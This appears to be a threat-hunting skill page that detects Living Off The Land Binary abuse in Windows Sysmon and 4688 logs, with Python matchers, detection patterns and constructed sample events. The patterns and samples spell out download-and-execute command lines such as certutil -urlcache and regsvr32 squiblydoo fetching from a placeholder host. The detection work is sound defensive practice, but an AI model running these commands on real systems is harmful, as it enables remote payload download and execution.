
LOLBAS Detection Rules

v20260317
hunting-living-off-the-land-binaries
Monitors Windows process creation events to flag Living Off The Land Binary abuse by matching Event ID 4688/Sysmon 1 logs against LOLBAS database entries, supporting threat hunting and SIEM rule creation for fileless attacks.
Overview

Hunting Living Off The Land Binaries

Instructions

Detect LOLBAS abuse by analyzing Windows process creation events (Event ID 4688 / Sysmon 1) and matching command lines against known malicious patterns from the LOLBAS project.

import requests

# Fetch the LOLBAS database (JSON export of every documented binary)
resp = requests.get("https://lolbas-project.github.io/api/lolbas.json", timeout=30)
resp.raise_for_status()
lolbas_db = resp.json()

# Each entry carries the binary name and a list of documented abuse commands
for entry in lolbas_db:
    print(entry["Name"], [cmd["Command"] for cmd in entry.get("Commands", [])])

Key detection patterns:

  1. certutil -urlcache -split -f (download)
  2. mshta vbscript:Execute (script execution)
  3. regsvr32 /s /n /u /i:http (squiblydoo)
  4. rundll32 javascript: (script execution)
  5. wmic process call create (process creation)
  6. bitsadmin /transfer (download)

Examples

# Match Sysmon Event ID 1 against LOLBAS patterns (uses the python-evtx package)
import Evtx.Evtx as evtx

with evtx.Evtx("Microsoft-Windows-Sysmon.evtx") as log:
    for record in log.records():
        xml = record.xml()
        lowered = xml.lower()
        # Naive substring match over the whole event XML, not just the CommandLine field
        if "certutil" in lowered and "urlcache" in lowered:
            print(f"LOLBAS detected: {xml}")
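The following detector is an added example, not part of this skill's own code. It serves both the key detection patterns above and the evtx snippet: the patterns become per-binary, case-insensitive rules, and instead of substring-searching the whole event XML it parses exported Sysmon Event ID 1 and Security 4688 records, matches on the executable's file name (and on Sysmon's OriginalFileName field, so a renamed copy is still caught) and applies each rule only to that binary's CommandLine. Switch order is not enforced, and the certutil rule accepts -urlcache with -f whether or not -split is present. The helper names, the `_event` builder and all sample events are constructed for this example; example.invalid is a reserved, non-routable hostname.

```python
import ntpath
import re
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# Every element in an exported Windows event lives in this namespace.
NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}


def _all(*tokens):
    """Case-insensitive regex that requires every token somewhere in the string."""
    return re.compile("".join(f"(?=.*{t})" for t in tokens), re.I | re.S)


# The key detection patterns from the list above, keyed by binary name so a
# pattern is only tried against the command line of the binary it belongs to.
LOLBAS_PATTERNS = {
    "certutil.exe":  [(_all(r"-urlcache\b", r"-f\b"), "download")],
    "mshta.exe":     [(_all(r"vbscript:\s*execute"), "script execution")],
    "regsvr32.exe":  [(_all(r"/u\b", r"/i:https?://"), "squiblydoo")],
    "rundll32.exe":  [(_all(r"\bjavascript:"), "script execution")],
    "wmic.exe":      [(_all(r"\bprocess\s+call\s+create\b"), "process creation")],
    "bitsadmin.exe": [(_all(r"/transfer\b"), "download")],
}


def parse_event(xml_text):
    """Return (event_id, {Data@Name: text}) for one exported event."""
    root = ET.fromstring(xml_text)
    event_id = int(root.find("e:System/e:EventID", NS).text)
    data = {d.get("Name"): (d.text or "")
            for d in root.findall("e:EventData/e:Data", NS)}
    return event_id, data


def match_event(xml_text):
    """Return [(binary, technique, command_line)] hits for one Sysmon 1 / 4688 event."""
    event_id, data = parse_event(xml_text)
    if event_id not in (1, 4688):
        return []
    # Sysmon calls the field Image, Security 4688 calls it NewProcessName.
    image = data.get("Image") or data.get("NewProcessName") or ""
    cmdline = data.get("CommandLine", "")
    # Match on the executable's file name and on Sysmon's OriginalFileName
    # (taken from the PE version resource) so a renamed certutil is still caught.
    candidates = [ntpath.basename(image).lower(),
                  data.get("OriginalFileName", "").lower()]
    hits = []
    for binary in dict.fromkeys(c for c in candidates if c):
        for pattern, technique in LOLBAS_PATTERNS.get(binary, []):
            if pattern.search(cmdline):
                hits.append((binary, technique, cmdline))
    return hits


def hunt(xml_records):
    """Run every record through match_event and return the flat list of hits."""
    return [hit for rec in xml_records for hit in match_event(rec)]


def _event(event_id, **fields):
    """Build a minimal exported-event XML string (constructed sample data)."""
    data = "".join(f'<Data Name="{k}">{escape(v)}</Data>' for k, v in fields.items())
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>{event_id}</EventID></System>'
            f"<EventData>{data}</EventData></Event>")


# Constructed sample events covering a true positive per event type, a benign
# use of certutil, a decoy where the pattern text sits in a file name, a renamed
# copy of certutil, and a non-process event that must be ignored.
SAMPLE_EVENTS = [
    _event(1, Image=r"C:\Windows\System32\certutil.exe", OriginalFileName="CertUtil.exe",
           CommandLine=r"certutil -urlcache -split -f http://example.invalid/p.txt C:\Users\Public\p.txt"),
    _event(4688, NewProcessName=r"C:\Windows\System32\regsvr32.exe",
           CommandLine="regsvr32 /s /n /u /i:http://example.invalid/f.sct scrobj.dll"),
    _event(1, Image=r"C:\Windows\System32\certutil.exe", OriginalFileName="CertUtil.exe",
           CommandLine=r"certutil -hashfile C:\tools\setup.exe SHA256"),
    _event(1, Image=r"C:\Windows\System32\notepad.exe", OriginalFileName="NOTEPAD.EXE",
           CommandLine=r'notepad.exe "C:\docs\certutil -urlcache notes.txt"'),
    _event(1, Image=r"C:\Users\Public\svc.exe", OriginalFileName="CertUtil.exe",
           CommandLine=r"svc.exe -urlcache -f http://example.invalid/x.bin x.bin"),
    _event(1, Image=r"C:\Windows\System32\wbem\WMIC.exe", OriginalFileName="wmic.exe",
           CommandLine='wmic process call create "cmd /c whoami"'),
    _event(4624, TargetUserName="alice"),
]

if __name__ == "__main__":
    for binary, technique, cmdline in hunt(SAMPLE_EVENTS):
        print(f"LOLBAS {technique:<17} {binary:<13} {cmdline}")
```

Run stand-alone it prints four hits (the certutil download, the 4688 squiblydoo, the renamed certutil and the wmic process creation) and stays silent on the benign hash, the decoy file name and the logon event. Keying rules by binary is what removes the decoy false positive: the evtx snippet above would flag any event whose XML merely contains the strings "certutil" and "urlcache". To run it over a real export, feed `record.xml()` strings from python-evtx into `hunt` in place of `SAMPLE_EVENTS`.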
Info
Category Development
Name hunting-living-off-the-land-binaries
Version v20260317
Size 8.25KB
Updated At 2026-03-18
Language